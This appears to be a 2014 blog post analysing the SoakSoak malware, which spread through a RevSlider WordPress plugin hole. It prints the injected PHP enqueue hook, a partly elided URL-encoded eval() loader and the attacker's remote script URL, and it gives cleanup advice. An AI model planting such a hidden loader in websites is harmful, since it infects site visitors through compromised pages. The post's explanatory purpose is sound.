What's Up with Google Blocking 1 Million WordPress Sites?

Posted on - Last Modified on

Google is de-indexing and blocking sites enabled with the RevSlider plugin. By using a security loop hole found in the WP premium plugin RevSlider, SoakSoak modifies a file in a site’s WordPress installation and loads JS malware.

RevSlider is often used in WordPress themes, some time this plugin is pre-loaded in WP themes , so site owner do not even get notifed about the vulnerability found on his/her site, Moreover, it’s not a plugin that’s easily updated, as Sucuri’s Daniel Cid commented:

“The biggest issue is that the RevSlider plugin is a premium plugin, it’s not something everyone can easily upgrade and that in itself becomes a disaster for website owner. Some website owners don’t even know they have it as it’s been packaged and bundled into their themes”.

Visitors of infected sites may be redirected to a webpage that will attempt to download malware onto their computers. Google’s decision to block infected sites shortly after the vulnerability became known will hopefully prevent the malware from spreading any further.

Anatomy Behind SoakSoak Malware:

It is modifying the file wp-includes/template-loader.php and including following code snippets:

<?php
function FuncQueueObject()
{
  wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts", 'FuncQueueObject');

Above Snippet further resulted in Js Code file found at wp-includes/js/swfobject.js to be loaded on every page you view on the site which includes the malware here:

eval(decodeURIComponent ("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));

This malware when decoded loads a javascript malware from the SoakSoack.ru domain, specifically this file: http://soaksoak.ru/xteas/code and then it will leads visitor to download certain files forcefully.

If you are curious about your site, you should check if your site got infected by Soak-Soak Malware from Free SiteCheck scanner -- signatures have all been updated to detect the latest redirection:

Sucuri soaksoak site check

Solutions :

Solutions not yet found on older version of Revslider Plugin, but you can keep update latest plugin to avoid security loop hole.

If your site already got infected by this malware you first update the plugins or better to remove it as well as there is a list of resources in this WordPress Support thread that can help you correct the problem.

Posted 20 December, 2014

Growth Hacker

Guaranteed Satisfaction. On Time Delivery.

I am a freelance growth hacker to hire. I am proficient on marketing, website design and growth hacking techniques to skyrocket your business growth. Why should you hire growth hacker?, when you can easily find lots of other professionals growth hacker on this site? Here are the facts: 1) I am an expert at ranking your site on Google first Page by using my SEO Skills. 2) I can craft your PSD...

Next Article

How to Install and Start Using WordPress